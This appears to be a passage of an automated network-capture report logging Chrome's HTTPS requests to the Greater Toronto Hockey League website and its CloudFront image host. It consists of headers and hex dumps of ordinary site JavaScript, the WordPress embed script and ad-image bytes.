                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 2c 20 74 68 69 73 2e 69 73 4f 76 65 72 74 69 6d 65 47 61 6d 65 28 74 68 69 73 2e 70 72 6f 70 73 2e 64 61 74 61 29 20 3f 20 74 68 28 7b 0a 20 20 20 20 20 20 20 20 63 6c 61 73 73 4e 61 6d 65 3a 20 22 74 61 62 6c 65 5f 5f 74 68 2d 2d 64 61 72 6b 22 0a 20 20 20 20 20 20 7d 2c 20 63 70 6c 5f 6c 31 30 6e 2e 6f 74 29 20 3a 20 76 6f 69 64 20 30 2c 20 74 68 69 73 2e 69 73 4f 76 65 72 74 69 6d 65 32 47 61 6d 65 28 74 68 69 73 2e 70 72 6f 70 73 2e 64 61 74 61 29 20 3f 20 74 68 28 7b 0a 20 20 20 20 20 20 20 20 63 6c 61 73 73 4e 61 6d 65 3a 20 22 74 61 62 6c 65 5f 5f 74 68 2d 2d 64 61 72 6b 22 0a 20 20 20 20 20 20 7d 2c 20 63 70 6c 5f 6c 31 30 6e 2e 6f 74 32 29 20 3a 20 76 6f 69 64 20 30 2c 20 74 68 69 73 2e 69 73 4f 76 65 72 74 69 6d 65 33 47 61 6d 65 28 74 68 69 73
                                                                                                                          Data Ascii: , this.isOvertimeGame(this.props.data) ? th({ className: "table__th--dark" }, cpl_l10n.ot) : void 0, this.isOvertime2Game(this.props.data) ? th({ className: "table__th--dark" }, cpl_l10n.ot2) : void 0, this.isOvertime3Game(this
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 7b 0a 20 20 20 20 20 20 20 20 63 6c 61 73 73 4e 61 6d 65 3a 20 22 67 61 6d 65 63 65 6e 74 72 65 2d 74 6f 70 73 63 6f 72 65 72 73 22 0a 20 20 20 20 20 20 7d 2c 20 68 35 28 7b 0a 20 20 20 20 20 20 20 20 63 6c 61 73 73 4e 61 6d 65 3a 20 22 70 61 67 65 2d 73 75 62 74 69 74 6c 65 22 0a 20 20 20 20 20 20 7d 2c 20 63 70 6c 5f 6c 31 30 6e 2e 74 6f 70 5f 73 63 6f 72 65 72 73 29 2c 20 54 6f 70 53 63 6f 72 65 72 73 54 61 62 6c 65 28 7b 0a 20 20 20 20 20 20 20 20 6c 65 61 67 75 65 3a 20 74 68 69 73 2e 70 72 6f 70 73 2e 6c 65 61 67 75 65 2c 0a 20 20 20 20 20 20 20 20 68 6f 6d 65 3a 20 74 68 69 73 2e 70 72 6f 70 73 2e 64 61 74 61 2e 68 6f 6d 65 5f 74 65 61 6d 2c 0a 20 20 20 20 20 20 20 20 61 77 61 79 3a 20 74 68 69 73 2e 70 72 6f 70 73 2e 64 61 74 61 2e 76 69 73 69 74
                                                                                                                          Data Ascii: { className: "gamecentre-topscorers" }, h5({ className: "page-subtitle" }, cpl_l10n.top_scorers), TopScorersTable({ league: this.props.league, home: this.props.data.home_team, away: this.props.data.visit
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 74 69 76 65 5f 67 61 6d 65 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 69 73 5f 73 68 6f 6f 74 6f 75 74 5f 67 61 6d 65 3a 20 66 61 6c 73 65 0a 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 7d 2c 0a 20 20 20 20 67 65 74 49 6e 69 74 69 61 6c 53 74 61 74 65 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 7b 0a 20 20 20 20 20 20 20 20 69 73 5f 6d 6f 62 69 6c 65 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 73 68 6f 77 5f 73 65 74 74 69 6e 67 73 5f 77 69 6e 64 6f 77 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 70 65 72 69 6f 64 73 3a 20 7b 7d 2c 0a 20 20 20 20 20 20 20 20 6f 70 74 69 6f 6e 73 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 67 6f 61 6c 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 61 62 65 6c 3a 20
                                                                                                                          Data Ascii: tive_game: false, is_shootout_game: false }; }, getInitialState: function() { return { is_mobile: false, show_settings_window: false, periods: {}, options: { goal: { label:
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 70 5f 6a 65 72 73 65 79 5f 6e 75 6d 62 65 72 3a 20 70 6c 61 79 2e 67 6f 61 6c 5f 73 63 6f 72 65 72 2e 6a 65 72 73 65 79 5f 6e 75 6d 62 65 72 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 70 5f 70 6c 61 79 65 72 5f 6e 61 6d 65 3a 20 70 6c 61 79 2e 67 6f 61 6c 5f 73 63 6f 72 65 72 2e 66 69 72 73 74 5f 6e 61 6d 65 20 2b 20 22 20 22 20 2b 20 70 6c 61 79 2e 67 6f 61 6c 5f 73 63 6f 72 65 72 2e 6c 61 73 74 5f 6e 61 6d 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 68 6f 77 5f 62 6f 74 74 6f 6d 5f 6c 69 6e 65 3a 20 66 61 6c 73 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 22 68 69 74 22 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72
                                                                                                                          Data Ascii: , top_jersey_number: play.goal_scorer.jersey_number, top_player_name: play.goal_scorer.first_name + " " + play.goal_scorer.last_name, show_bottom_line: false }); case "hit": retur
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 7d 2c 0a 20 20 20 20 73 68 6f 77 50 6c 61 79 65 72 54 65 78 74 4c 65 67 65 6e 64 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 28 74 68 69 73 2e 70 72 6f 70 73 2e 64 61 74 61 2e 76 69 73 69 74 6f 72 5f 74 65 61 6d 5f 6c 69 6e 65 75 70 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 70 6c 61 79 65 72 73 22 29 20 26 26 20 74 68 69 73 2e 70 72 6f 70 73 2e 64 61 74 61 2e 76 69 73 69 74 6f 72 5f 74 65 61 6d 5f 6c 69 6e 65 75 70 2e 70 6c 61 79 65 72 73 2e 6c 65 6e 67 74 68 20 3e 20 30 29 20 7c 7c 20 28 74 68 69 73 2e 70 72 6f 70 73 2e 64 61 74 61 2e 68 6f 6d 65 5f 74 65 61 6d 5f 6c 69 6e 65 75 70 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 70 6c 61 79
                                                                                                                          Data Ascii: } }; }, showPlayerTextLegend: function() { return (this.props.data.visitor_team_lineup.hasOwnProperty("players") && this.props.data.visitor_team_lineup.players.length > 0) || (this.props.data.home_team_lineup.hasOwnProperty("play


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          73192.168.11.2049886137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:18 UTC421OUTGET /wp/wp-includes/js/wp-embed.min.js?ver=4.5.3 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:18 UTC519INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 1403
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Sat, 11 Feb 2017 06:10:05 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961971159 961417557
                                                                                                                          Age: 84
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"589eaabd-57b"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:18 UTC1403INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 69 66 28 21 65 29 7b 65 3d 21 30 3b 76 61 72 20 61 2c 63 2c 64 2c 66 2c 67 3d 2d 31 21 3d 3d 6e 61 76 69 67 61 74 6f 72 2e 61 70 70 56 65 72 73 69 6f 6e 2e 69 6e 64 65 78 4f 66 28 22 4d 53 49 45 20 31 30 22 29 2c 68 3d 21 21 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 54 72 69 64 65 6e 74 2e 2a 72 76 3a 31 31 5c 2e 2f 29 2c 69 3d 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 69 66 72 61 6d 65 2e 77 70 2d 65 6d 62 65 64 64 65 64 2d 63 6f 6e 74 65 6e 74 22 29 3b 66 6f 72 28 63 3d 30 3b 63 3c 69 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 69 66 28 64 3d 69 5b 63 5d 2c 21 64 2e 67 65 74 41 74 74
                                                                                                                          Data Ascii: !function(a,b){"use strict";function c(){if(!e){e=!0;var a,c,d,f,g=-1!==navigator.appVersion.indexOf("MSIE 10"),h=!!navigator.userAgent.match(/Trident.*rv:11\./),i=b.querySelectorAll("iframe.wp-embedded-content");for(c=0;c<i.length;c++)if(d=i[c],!d.getAtt


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          74192.168.11.204988754.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:18 UTC661OUTGET /app/uploads/gthl/2024/01/09095632/Big-box-ad-creative-300x25012.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:18 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 87962
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:19 GMT
                                                                                                                          Last-Modified: Tue, 09 Jan 2024 14:56:33 GMT
                                                                                                                          ETag: "4acb2561715fb939fa4403a1fe259898"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 ec8b1bfbf511818c606f196b49f871e2.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: zk7CBmZPTQNkQMqCwAQ0DvGUZsZ759XbHFt3ka1iNf_9lFSNFutCOQ==
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 8e 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 31 34 36 32 38 39 39 37 37 37 2c 20 32 30 32 33 2f 30 36 2f 32 35 2d 32 33 3a 35 37 3a 31 34 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44
                                                                                                                          Data Ascii: ExifII*Duckydhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RD
                                                                                                                          2025-01-13 21:01:18 UTC595INData Raw: 5e 0d 15 78 a1 7c 1a a6 a1 4c e0 36 22 5d 00 75 01 1d 9b 87 b0 88 f5 21 e5 83 1b 62 9a 85 3a c5 f0 07 b9 00 74 0b a1 ed c0 89 b5 4c a0 51 13 a6 50 10 02 18 bf 70 77 0f b4 34 1d 44 47 50 87 33 88 e1 b0 be 43 38 6d 92 b9 39 71 e3 bd d2 87 55 e3 a6 4f 85 c3 f1 dc 82 8a 9f c5 bc 9f 73 76 61 8f 6d cf 72 dd 42 ab 5d ad 5a 80 b4 ca 9d d9 da d3 18 f2 42 0d 57 2d 80 50 66 e0 be e8 c6 6a f5 a3 80 2a a5 e8 5b 23 75 59 ed bb 6b db 7b 89 af ed 66 ba 6b 72 b3 d9 e4 ea a8 85 d9 9d 3d b7 8c 65 94 30 07 89 1e c8 0c 8c 38 63 01 ad e9 72 6a 4f 0c 8b 1d bc f1 c4 24 06 29 eb 90 97 03 2b f0 57 f6 92 84 0a af 26 6a 32 9e 6d f3 39 f1 15 cb e9 6b 2c be 52 6d 71 e2 bc 15 ed 4c 58 eb 8e 31 18 ca 09 5c f2 96 3e a4 f1 e9 5e 1c 49 71 bf f0 75 cb bd 81 6b 35 85 36 11 f6 cb 02 d3 6d e0
                                                                                                                          Data Ascii: ^x|L6"]u!b:tLQPpw4DGP3C8m9qUOsvamrB]ZBW-Pfj*[#uYk{fkr=e08crjO$)+W&j2m9k,RmqLX1\>^Iquk56m
                                                                                                                          2025-01-13 21:01:18 UTC12792INData Raw: 50 43 34 49 9c ba e4 12 38 78 d9 57 a7 26 53 17 14 55 cd c1 42 90 c2 a4 05 2b 87 be 30 f9 23 01 c9 a8 7e 43 67 2c 97 84 b2 ac 64 c4 fd be 8d 96 a2 8c cb 22 8d a7 26 e0 96 18 c7 1d d4 b1 03 59 fb 44 b1 9c 43 ce 59 28 b7 3c 2f 5b b1 fe 2d 48 66 bf fc 52 4a 5d c2 f3 8f 95 33 5d b8 0d 4f 7e e8 53 6d f6 d1 34 9b 7b bb 77 44 49 21 6a c5 92 3b 83 2c 8f 31 54 1e d2 a4 89 3c b1 67 0e 7d 84 89 44 48 33 63 27 6f a2 df 47 aa fd e3 34 91 32 b3 3a ba d1 b3 18 b2 a0 8f da 26 84 ab 46 ad 97 28 00 c9 25 18 f0 25 f7 4c 45 01 45 43 c2 5f 70 00 bf 95 b7 84 a0 93 74 8a 88 18 55 28 6e 10 2a 84 01 36 ba 86 a4 12 fa eb e9 c8 b1 b4 70 c5 db 43 c1 ae d3 fb 3f 75 b3 f2 1e dc be e3 cf e0 dd e3 d3 cf a6 df ae dd de 9d fd 7b 74 60 a7 1a 60 3e a9 c8 24 5f 45 c0 13 27 98 ae dc 15 62 94
                                                                                                                          Data Ascii: PC4I8xW&SUB+0#~Cg,d"&YDCY(</[-HfRJ]3]O~Sm4{wDI!j;,1T<g}DH3c'oG42:&F(%%LEEC_ptU(n*6pC?u{t``>$_E'b
                                                                                                                          2025-01-13 21:01:18 UTC3592INData Raw: 9a 41 47 a5 3b 0d ce 81 32 9a 9c ab 23 c6 cb 14 9d 29 0a 9a 3d 03 64 34 e0 d4 6e 06 9c f8 f0 c5 fe 97 3d 9d b6 a7 6f 3e a1 68 2f ec 52 64 32 5b 17 78 c4 e8 18 66 8b a9 17 e5 13 a8 2a b9 93 da 15 a8 e3 86 3c c1 bc 5c c4 33 5c 66 ae 72 43 96 5c c3 e4 7f 1f e2 33 15 82 cd 4f 56 ab 1e 9c ce 53 65 62 2a f2 b7 06 31 e9 3c 62 f2 d6 9b d7 6c 6c d5 9a e3 b7 6e 08 e8 55 6a e1 be e5 4a 6f 0b 84 92 0d 62 d9 a3 fb 8e 2b fd 6f 55 d4 61 59 63 19 dc 4c d9 4e 6a d2 8a 90 b3 80 eb 46 0b 42 54 1a 13 c0 9c 7a 0b 53 b9 bb 1d d0 bd d9 bd bf d8 db 57 50 b9 b2 bc 91 61 b7 6b 1e a4 b1 f4 28 64 8e 49 5e f9 21 98 db 38 68 5e 62 c1 2e 0c 7d 45 5a 48 17 1c 3a 3f c5 97 07 39 8b ce bc 3f 83 f0 ce 5e cb 99 e2 9f 79 a0 dc 67 f2 ce 6b 9a c6 70 d5 87 78 c5 3a 84 0c eb b8 06 15 7a c3 b7 a1
                                                                                                                          Data Ascii: AG;2#)=d4n=o>h/Rd2[xf*<\3\frC\3OVSeb*1<bllnUjJob+oUaYcLNjFBTzSWPak(dI^!8h^b.}EZH:?9?^ygkpx:z
                                                                                                                          2025-01-13 21:01:18 UTC1024INData Raw: 0b 05 6c 38 07 c6 c7 1f 7e 78 70 af 10 ea 3c cd f8 ef ca 32 d9 3f 06 5d 15 9b 7a ff 00 8f ec 2c 8c 2f 2e a3 97 a6 5a 25 e8 53 0d de e0 dc b2 8a 90 96 25 88 bc 47 95 aa d5 c7 07 5c ad 80 a7 02 26 72 18 0b bd 49 3e d2 95 de cf 5f 8b a5 70 1b d9 98 82 a0 82 01 04 48 be 15 a8 39 b8 56 a0 e3 47 85 d9 aa b1 b2 b1 53 c4 57 88 34 ad 0f 3c bc 38 f2 24 83 e5 85 85 95 7f e6 52 cc 15 13 21 85 fe 43 b8 39 65 c4 f7 e4 0e c4 92 16 8c 7c d2 c3 41 97 1f 64 ab 54 5d af 2d 88 32 b9 43 dd ae 2a 10 cb 9c 62 a6 48 90 09 f6 91 3d 36 f5 88 d6 76 ad 94 10 25 f6 91 74 b2 db 39 a0 06 8d e0 58 51 d7 d0 3c 46 2b 2c cd c0 48 a4 35 3f 93 95 79 79 13 87 57 c1 b6 a8 fb ef 1d cd 6b 88 2b a0 8c b9 7f 4f da a2 ca fd b0 b3 7d f8 c9 e8 a6 92 ec 85 d3 5d ea 0b 57 5e dd f8 79 93 dc 6d 86 d4 04
                                                                                                                          Data Ascii: l8~xp<2?]z,/.Z%S%G\&rI>_pH9VGSW4<8$R!C9e|AdT]-2C*bH=6v%t9XQ<F+,H5?yyWk+O}]W^ym
                                                                                                                          2025-01-13 21:01:18 UTC12792INData Raw: 68 38 f2 a4 44 e2 56 b2 18 51 5c aa 25 ee 0f 53 f5 a4 6a fa 7f bb e8 e9 28 d5 a6 40 9f e6 df a7 04 8f 44 95 99 c8 cb 48 6a c6 a0 93 55 00 f1 e1 8c 52 f6 09 bb 69 bf 63 d5 7b 99 3e 95 27 6d f4 e9 9a fc 56 fe d5 6e 35 8d 3e 05 7b ab 28 a0 b4 8e 63 78 87 59 8d 21 8a 20 d1 46 55 6e 73 92 88 0b 89 20 71 57 05 46 f1 97 8e 38 63 03 44 a1 1c 87 f6 ce 85 0f 07 32 b4 4e ef c7 ca dc 16 4d 79 ab ed 90 a6 39 53 3a 8a 5a af 32 72 32 aa 9c 4a 5f dd 78 61 da 50 10 00 db 6d e0 8e d6 04 b5 87 fc cc 68 15 7f c9 51 41 f8 06 3c d9 ae eb 3a 86 e3 d6 af 37 0e ae e6 4d 56 fe ea 5b 89 9c 9a 96 96 79 1a 59 18 9f 12 ce cc 4f af 00 2e 7a e5 13 e1 2e 1e f2 1b 30 12 3a 4e 60 98 ba 80 f7 21 3b 87 85 f0 04 d4 c4 75 35 d3 2b 2c a4 54 37 ba 51 16 a3 2d 25 19 1c aa 0d 8a aa 89 a6 65 94 28
                                                                                                                          Data Ascii: h8DVQ\%Sj(@DHjURic{>'mVn5>{(cxY! FUns qWF8cD2NMy9S:Z2r2J_xaPmhQA<:7MV[yYO.z.0:N`!;u5+,T7Q-%e(
                                                                                                                          2025-01-13 21:01:18 UTC4616INData Raw: 4b 18 bd e2 7e 46 28 4a 68 9b 0c a3 eb 1c 71 44 41 42 95 09 f7 0b 49 b9 64 02 1a 80 a4 d5 e3 85 51 4c 3f ec a5 a7 d7 a9 fd 78 81 a1 e0 70 a2 78 92 b3 d2 4d da 59 8b d7 23 09 1a d6 b0 bb 28 a5 15 de c1 a3 a4 e6 96 91 28 b2 21 c8 63 b3 49 52 c5 6d 14 93 31 52 01 30 98 08 06 31 84 68 7b bd b0 b9 37 a2 34 17 8c b9 4b 80 03 32 d4 1a 31 f1 e2 a3 9d 4f 01 c6 98 c8 b6 af ab 3e 92 9a 0c 97 33 b6 89 1c c6 64 b7 67 63 12 4a 54 a9 91 10 d4 23 15 62 0e 5a 03 5e 20 9a 60 ec b6 95 aa d8 8e 65 9b a4 51 72 d9 d4 9c bb 65 5b 38 48 aa b7 5d 23 0f 8c e9 aa 8a 85 32 6a 24 b2 66 31 04 0c 1b 77 00 76 d3 aa b8 b0 3e 58 4d 3c 7f 83 8c 8d 98 bb cb b6 62 d9 b2 e8 d7 5c 26 a3 a2 10 3d c9 c1 45 48 25 4c ee 47 72 ca 10 a0 90 6d 28 98 40 04 03 40 ec 1d 49 89 6e 24 d4 e2 0a a1 46 55 e0
                                                                                                                          Data Ascii: K~F(JhqDABIdQL?xpxMY#((!cIRm1R01h{74K21O>3dgcJT#bZ^ `eQre[8H]#2j$f1wv>XM<b\&=EH%LGrm(@@In$FU
                                                                                                                          2025-01-13 21:01:18 UTC1730INData Raw: df b9 55 3f dc b2 e5 01 ff 00 39 b5 0f 4f d3 a2 b8 29 c3 1c 7f c6 ba f2 7b af 70 3e 5f 26 ff 00 e6 3e be 2d df ae 9f f1 34 fa fe bd ba 2a 3e 6c 19 4e 35 11 45 50 13 20 b6 8e 4a a9 96 1f 70 20 dc c6 87 28 a6 9e d4 53 36 dd 4b b7 4d 40 7d 77 00 8f f1 e8 f5 e1 d3 cf 01 bb ed ae 03 1b d2 6e 19 0e c6 55 c6 0e a3 5e 9c b2 ca a6 cc ad 4c f9 fb 28 58 d5 de aa 8b 14 d6 59 aa 0b c8 3d 4d bf 89 ba 66 51 30 51 73 90 ba 86 bd 30 0f 87 3c 23 40 2a 71 f3 ab f9 65 e4 b6 68 ca 1c 8a c9 12 e4 a2 42 8b 2b 6d 3a 05 c5 ad bc 62 ca 03 6c 78 48 56 31 90 90 88 31 b0 b8 32 41 2e ab f4 c8 44 9d 26 ba 68 aa de 55 35 c8 1a 10 e8 90 2a 65 a7 0c 5b 97 cd c6 98 63 14 9b c9 48 bf 5d 15 da ac 59 77 b2 2b 11 76 be 03 a4 b8 48 b9 74 a1 95 4b c0 60 03 a6 73 2e 7f e5 d3 eb db b6 9d 33 88 8f
                                                                                                                          Data Ascii: U?9O){p>_&>-4*>lN5EP Jp (S6KM@}wnU^L(XY=MfQ0Qs0<#@*qehB+m:blxHV112A.D&hU5*e[cH]Yw+vHtK`s.3
                                                                                                                          2025-01-13 21:01:18 UTC9000INData Raw: bf b1 cc 4b 13 ed a2 75 23 1c 78 19 20 02 87 8b 83 cd 87 b9 0b c5 ac f3 9d d9 d0 23 6e 8f 9c 43 d9 13 63 22 ee eb 61 c8 c6 74 79 58 84 93 70 8c 24 39 1c 34 51 64 df 4d b9 77 1b 0c df d8 22 99 c8 47 29 81 94 05 47 53 1b ae bd b7 ce a1 f7 5a 0d 53 ad ef 81 9c 1e ae 6c e2 8c c0 03 9b da e0 00 a5 7c 29 4e 14 c7 cd 9e f1 26 cf 1b fe ed f6 27 b9 fe ac 3c 76 ef 17 ba 95 e8 13 25 b4 2f 21 4c 9e c8 26 56 7c ca 39 3e 60 40 35 01 19 f2 4b 1f d5 38 15 4a a7 d7 30 9e 4e b4 cc e4 3b d7 e6 d5 b0 dc 24 59 a5 1e dd b4 32 69 26 d9 37 35 08 a5 03 7c 22 b2 4a 28 aa 25 76 6f 21 8e 92 26 30 6d 50 84 10 cd fa 7c 31 cc 0e 5f 4d 7f 05 3e bc 21 c6 77 db 4d 92 0a 1a b7 6f b7 39 9b ae 22 f8 a6 4e 7a f2 f1 f3 95 ab aa 49 2f 18 e9 fb a8 57 ef 97 59 da 84 50 ad f7 82 5a 89 88 20 63 a4
                                                                                                                          Data Ascii: Ku#x #nCc"atyXp$94QdMw"G)GSZSl|)N&'<v%/!L&V|9>`@5K8J0N;$Y2i&75|"J(%vo!&0mP|1_M>!wMo9"NzI/WYPZ c
                                                                                                                          2025-01-13 21:01:18 UTC8408INData Raw: 72 e9 8a 1e 78 a5 e3 dc a4 8a 2c 9a aa 20 70 48 5a 98 ba e8 25 32 85 dc 3d ca 02 14 f1 53 0b cf 8e d0 58 e6 eb 70 c6 eb 58 1e 4d d9 e3 a1 67 18 da 2c 55 87 2f a6 9f 54 ad 46 8e 82 9a 2a 6d ca 83 e0 52 29 c9 8e e5 c1 12 5d 3d 4c 65 d1 30 a4 62 1d 31 11 2d 85 fd e3 59 98 32 80 7a b7 09 1f 1f 00 d5 24 fe 0a 0f 49 07 d1 8d 93 6f 68 51 eb 71 6a 52 bb 95 f7 0d 32 5b a0 a3 9b 94 78 a3 0a 3d 46 5e a3 70 35 44 61 c2 b5 08 82 2a 42 22 66 e9 62 95 b0 c9 9c 8a 3d 43 21 a9 10 00 3e 31 52 72 64 b2 ce a3 24 fc 84 02 80 2b 15 26 f8 a6 6e 25 d0 e9 3d 04 54 2f fc 33 75 7f 5c 6b 63 03 56 aa cb 5a 67 16 76 b2 a7 19 22 9a 39 b2 6a 6f 55 df 95 53 36 48 0a 51 07 c6 72 a0 b8 d0 00 ca 28 26 13 1d 43 89 87 4d 7a 98 e5 88 f3 38 77 ef 8d 59 69 28 19 5b 6e 46 34 69 ad 8e 31 9d 32 f1
                                                                                                                          Data Ascii: rx, pHZ%2=SXpXMg,U/TF*mR)]=Le0b1-Y2z$IohQqjR2[x=F^p5Da*B"fb=C!>1Rrd$+&n%=T/3u\kcVZgv"9joUS6HQr(&CMz8wYi([nF4i12


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          75192.168.11.204988854.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:18 UTC412OUTGET /app/uploads/gthl/2024/08/29093926/icons8-rss-48-1.png HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:18 UTC484INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 817
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:19 GMT
                                                                                                                          Last-Modified: Thu, 29 Aug 2024 13:39:27 GMT
                                                                                                                          ETag: "11c4233c46670a65187b0d2a340a2352"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 924c3fd5fff04ef5cac09fbfc470e618.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: scgh4qncV6YUn7jccZojeT1ozA7TqTyJvJ0zOvdR43qg6UovEHJs3g==
